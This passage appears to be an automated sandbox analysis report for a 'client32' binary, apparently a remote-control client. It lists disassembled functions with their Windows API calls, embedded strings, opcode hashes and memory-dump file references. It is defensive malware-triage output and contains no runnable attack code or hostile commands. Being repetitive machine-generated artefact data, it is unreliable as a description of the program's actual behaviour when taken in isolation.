                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ItemMenu$_memset$CheckCountEnableInfoVersion
                                                                                                                                                    • String ID: 0
                                                                                                                                                    • API String ID: 176136580-4108050209
                                                                                                                                                    • Opcode ID: 952994a233711950fdab02d23ca0bcaac5a8ee4e392a6680f60084daabe75429
                                                                                                                                                    • Instruction ID: be0221c4a5135c336c62c383b80ea9a6d71c1dc3530fa78f313eaeef8d4c2bd6
                                                                                                                                                    • Opcode Fuzzy Hash: 952994a233711950fdab02d23ca0bcaac5a8ee4e392a6680f60084daabe75429
                                                                                                                                                    • Instruction Fuzzy Hash: C621A17591111AABE741DB74CE84FAFBBACEF46358F104025F961E6160DB74DA00C772
                                                                                                                                                    Function 110812A0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 74COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • _memmove.LIBCMT ref: 1108132F
                                                                                                                                                    • _memset.LIBCMT ref: 11081318
                                                                                                                                                      • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                                      • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                                      • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                                                      • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorExitLastMessageProcess_memmove_memsetwsprintf
                                                                                                                                                    • String ID: ..\CTL32\DataStream.cpp$IsA()$m_iPos>=nBytes$nBytes>=0$pData
                                                                                                                                                    • API String ID: 75970324-4264523126
                                                                                                                                                    • Opcode ID: d8c9cfc558a83648f442f3398f9905bd9548d166cd1f75af1a89d4c0a32f60db
                                                                                                                                                    • Instruction ID: 3f790bad6e390bc8ea8a8f21c3872a9d67b2f4e4425326796fba8d3d5e2d5bab
                                                                                                                                                    • Opcode Fuzzy Hash: d8c9cfc558a83648f442f3398f9905bd9548d166cd1f75af1a89d4c0a32f60db
                                                                                                                                                    • Instruction Fuzzy Hash: 6B11EB7DF143126FC605DF41EC43F9AF3D4AF9064CF108039E94A27241E571B808C6A1
                                                                                                                                                    Function 1103F450 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 43sleepCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • IsWindow.USER32(00000000), ref: 1103F466
                                                                                                                                                    • FindWindowA.USER32(PCIVideoSlave32,00000000), ref: 1103F47C
                                                                                                                                                    • IsWindow.USER32(00000000), ref: 1103F484
                                                                                                                                                    • Sleep.KERNEL32(00000014), ref: 1103F497
                                                                                                                                                    • FindWindowA.USER32(PCIVideoSlave32,00000000), ref: 1103F4A7
                                                                                                                                                    • IsWindow.USER32(00000000), ref: 1103F4AF
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Window$Find$Sleep
                                                                                                                                                    • String ID: PCIVideoSlave32
                                                                                                                                                    • API String ID: 2137649973-2496367574
                                                                                                                                                    • Opcode ID: f9403fe9dea3d152aead7fa3d2adf20292fef7f356e696344d66dd2b7210a141
                                                                                                                                                    • Instruction ID: 349d86511175fe1d1df632f2bffc72f1f56a45a46628263fa2557b0125cca1c8
                                                                                                                                                    • Opcode Fuzzy Hash: f9403fe9dea3d152aead7fa3d2adf20292fef7f356e696344d66dd2b7210a141
                                                                                                                                                    • Instruction Fuzzy Hash: 44F0A473A4122A6EDB01EFF98DC4FA6B7D8AB84699F410074E968D7109F634E8014777
                                                                                                                                                    Function 11003400 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 41windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • LoadMenuA.USER32(00000000,00002EFF), ref: 1100340E
                                                                                                                                                    • GetSubMenu.USER32(00000000,00000000), ref: 1100343A
                                                                                                                                                    • GetSubMenu.USER32(00000000,00000000), ref: 1100345C
                                                                                                                                                    • DestroyMenu.USER32(00000000), ref: 1100346A
                                                                                                                                                      • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                                      • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                                      • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                                                      • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Menu$DestroyErrorExitLastLoadMessageProcesswsprintf
                                                                                                                                                    • String ID: ..\CTL32\annotate.cpp$hMenu$hSub
                                                                                                                                                    • API String ID: 468487828-934300333
                                                                                                                                                    • Opcode ID: cb09c6b33aa2397f6040dc9ac8fe113c92c7d1ba2ee6536d01521099fc9f1030
                                                                                                                                                    • Instruction ID: 1378fb0f7ab2c0978cd4d50cac7dc25882af45c4d25f08e40c7e232078aa5069
                                                                                                                                                    • Opcode Fuzzy Hash: cb09c6b33aa2397f6040dc9ac8fe113c92c7d1ba2ee6536d01521099fc9f1030
                                                                                                                                                    • Instruction Fuzzy Hash: B3F0E93AE9063573E25252A71C86F9FE2488B45699F500032F926BA580EA14B80043E9
                                                                                                                                                    Function 11003310 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 37windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • LoadMenuA.USER32(00000000,00002EF9), ref: 1100331D
                                                                                                                                                    • GetSubMenu.USER32(00000000,00000000), ref: 11003343
                                                                                                                                                    • GetMenuItemCount.USER32(00000000), ref: 11003367
                                                                                                                                                    • DestroyMenu.USER32(00000000), ref: 11003379
                                                                                                                                                      • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                                      • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                                      • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                                                      • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Menu$CountDestroyErrorExitItemLastLoadMessageProcesswsprintf
                                                                                                                                                    • String ID: ..\CTL32\annotate.cpp$hMenu$hSub
                                                                                                                                                    • API String ID: 4241058051-934300333
                                                                                                                                                    • Opcode ID: 85d4a40678ea7b6d13a0383658e2681328b2af046e894752399e51aa99d6900d
                                                                                                                                                    • Instruction ID: a78e3c2f88e64c1b086a81e8c9a2b46f663d882bee818e15e56a3ec0b04889ae
                                                                                                                                                    • Opcode Fuzzy Hash: 85d4a40678ea7b6d13a0383658e2681328b2af046e894752399e51aa99d6900d
                                                                                                                                                    • Instruction Fuzzy Hash: AEF02E36E9093A73D25212B72C4AFCFF6584F456ADB500031F922B5645EE14A40053A9
                                                                                                                                                    Function 11025712 Relevance: 12.1, APIs: 8, Instructions: 121windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetWindowTextA.USER32(?,?,00000050), ref: 11025766
                                                                                                                                                    • _strncat.LIBCMT ref: 1102577B
                                                                                                                                                    • SetWindowTextA.USER32(?,?), ref: 11025788
                                                                                                                                                      • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                                                                                      • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                                                                                      • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                                                                                    • GetDlgItemTextA.USER32(?,00001395,?,00000040), ref: 11025814
                                                                                                                                                    • GetDlgItemTextA.USER32(?,00001397,?,00000040), ref: 11025828
                                                                                                                                                    • SetDlgItemTextA.USER32(?,00001397,?), ref: 11025840
                                                                                                                                                    • SetDlgItemTextA.USER32(?,00001395,?), ref: 11025852
                                                                                                                                                    • SetFocus.USER32(?), ref: 11025855
                                                                                                                                                      • Part of subcall function 11025260: GetDlgItem.USER32(?,?), ref: 110252B0
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Text$Item$Window$Focus_malloc_memset_strncatwsprintf
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3832070631-0
                                                                                                                                                    • Opcode ID: 2b61e4ef957feb7ce17a8024798aa9246a1c5d1c409547fc379c5c00eb05ef8b
                                                                                                                                                    • Instruction ID: bfe7d5249f4b6e1d02486e1e3511efca77028c7631b8c8a816f62769cf0b8b3d
                                                                                                                                                    • Opcode Fuzzy Hash: 2b61e4ef957feb7ce17a8024798aa9246a1c5d1c409547fc379c5c00eb05ef8b
                                                                                                                                                    • Instruction Fuzzy Hash: 5D41A1B1A40349ABE710DB74CC85BBAF7F8FB44714F004969E62A97680EBB4A904CB54
                                                                                                                                                    Function 110EF790 Relevance: 12.1, APIs: 8, Instructions: 84filememoryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,111323D6,00000000,?), ref: 110EF7A8
                                                                                                                                                    • ReadFile.KERNEL32(00000000,00000000,0000000E,?,00000000,?,111323D6,00000000,?), ref: 110EF7BD
                                                                                                                                                    • GlobalAlloc.KERNEL32(00000042,-0000000E,00000000), ref: 110EF7DF
                                                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 110EF7EC
                                                                                                                                                    • ReadFile.KERNEL32(00000000,00000000,-0000000E,0000000E,00000000), ref: 110EF7FB
                                                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 110EF80B
                                                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 110EF825
                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 110EF82C
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Global$File$ReadUnlock$AllocFreeLockSize
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3489003387-0
                                                                                                                                                    • Opcode ID: dd8f80031ae181a8ed5eea704e92fea1ffadc77db63c751e718b3c2d07927bee
                                                                                                                                                    • Instruction ID: 752bd59a7f8b278135cd4218b820f19d57544efb101fbb4cfc0774b0aabdd1bf
                                                                                                                                                    • Opcode Fuzzy Hash: dd8f80031ae181a8ed5eea704e92fea1ffadc77db63c751e718b3c2d07927bee
                                                                                                                                                    • Instruction Fuzzy Hash: 3721C532A41019AFD704DFA5CA89AFEB7FCEB4421AF0001AEF91997540DF709901C7E2
                                                                                                                                                    Function 11089950 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 228COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 11088C40: IsWindow.USER32(?), ref: 11088C5F
                                                                                                                                                      • Part of subcall function 11088C40: IsWindow.USER32(?), ref: 11088C6D
                                                                                                                                                    • GetParent.USER32(00000000), ref: 11089996
                                                                                                                                                    • GetParent.USER32(00000000), ref: 110899A7
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ParentWindow
                                                                                                                                                    • String ID: .chm$.hlp$WinHelp cmd=%d, id=%d, file=%s$debughlp.$$$
                                                                                                                                                    • API String ID: 3530579756-3361795001
                                                                                                                                                    • Opcode ID: 434b2cb741835ac03b002844321d47e96989c184908e24c31a4124005bd277de
                                                                                                                                                    • Instruction ID: dcd0680657676d00064f31b5da51888b306acc0f32f54203c3ee3b251bcfdaac
                                                                                                                                                    • Opcode Fuzzy Hash: 434b2cb741835ac03b002844321d47e96989c184908e24c31a4124005bd277de
                                                                                                                                                    • Instruction Fuzzy Hash: F5712774E0426AAFDB11DFA4DD81FEFB7E8EF85308F4040A5E909A7241E771A944CB91
                                                                                                                                                    Function 1101B530 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 204libraryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 110DEB60: EnterCriticalSection.KERNEL32(111EE0A4,11018BE8,1EF76653,?,?,?,111CD988,11187878,000000FF,?,1101ABB2), ref: 110DEB61
                                                                                                                                                      • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                                                                                      • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                                                                                      • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                                                                                    • std::exception::exception.LIBCMT ref: 1101B776
                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 1101B791
                                                                                                                                                    • LoadLibraryA.KERNEL32(NSSecurity.dll,00000000,111CD988), ref: 1101B7AE
                                                                                                                                                      • Part of subcall function 11008DD0: std::_Xinvalid_argument.LIBCPMT ref: 11008DEA
                                                                                                                                                    Strings
                                                                                                                                                    • NsAppSystem Info : Control Channel Sending Command : %d, xrefs: 1101B6E9
                                                                                                                                                    • NSSecurity.dll, xrefs: 1101B7A3
                                                                                                                                                    • NsAppSystem Info : Control Channel Command Sent : %d, xrefs: 1101B70A
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
